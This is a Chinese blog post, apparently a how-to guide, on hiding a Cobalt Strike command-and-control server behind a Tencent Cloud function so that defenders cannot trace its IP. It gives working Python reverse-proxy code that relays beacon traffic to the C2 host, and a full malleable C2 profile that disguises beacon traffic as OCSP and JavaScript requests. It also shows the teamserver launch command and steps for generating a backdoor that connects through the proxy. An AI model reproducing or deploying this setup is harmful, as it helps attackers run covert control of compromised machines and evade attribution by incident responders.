TypechoJoeTheme

学习使用

统计
登录
用户名
密码

腾讯云函数实现IP隐匿

admin博主
2022-12-29
/
0 评论
/
496 阅读
/
208 个字
/
百度已收录
12/29
本文最后更新于2022年12月29日,已超过92天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

通过腾讯云函数进行反代,实现利用腾讯云CDN 隐匿C2 IP。

1、登陆腾讯云控制台-云函数

2、新建函数服务

3、粘贴下列代码


# -*- coding: utf8 -*-
import json,requests,base64


def main_handler(event, context):
    C2 = 'http://114.114.114.114'  # 114替换为你的 C2 IP ,协议为 HTTP或者HTTPS需要与监听器对应。 
    path = event['path']
    headers = event['headers']
    print(event)
    if event['httpMethod'] == 'GET':
        resp = requests.get(C2 + path, headers=headers, verify=False)
    else:
        resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
        print(resp.headers)
        print(resp.content)
    response = {"isBase64Encoded": True, "statusCode": resp.status_code, "headers": dict(resp.headers),
                "body": str(base64.b64encode(resp.content))[2:-1]}
    return response

注意这里的c2值使用http时,cs服务端只能监控http,https同理。



4、编辑API
点击前往配置页面

编辑api配置

将路径改为“/”。

点击下一步,配置如下

点击立即完成,并点击发布。

5、配置cs服务端
在服务器的Cobaltstrike目录下,新建xxx.profile文件,内容如下



set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "nginx";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}


使用自定义的配置文件启动cs服务端

./teamserver ip password tencent.profile


6、配置监听
复制腾讯api地址

输入时去除api的http和端口
如:

service-abcdefg-123456789.gz.apigw.tencentcs.com


生成后门(如果配置的https则选择windows executable (s))

上线后门,外部IP为腾讯云cdn IP且会不断变换,很难进行溯源。

朗读
赞(0)
赞赏
感谢您的支持,我会继续努力哒!
版权属于:

学习使用

本文链接:

https://159357654.xyz/index.php/archives/395/(转载时请注明本文出处及文章链接)

评论 (0)
本篇文章评论功能已关闭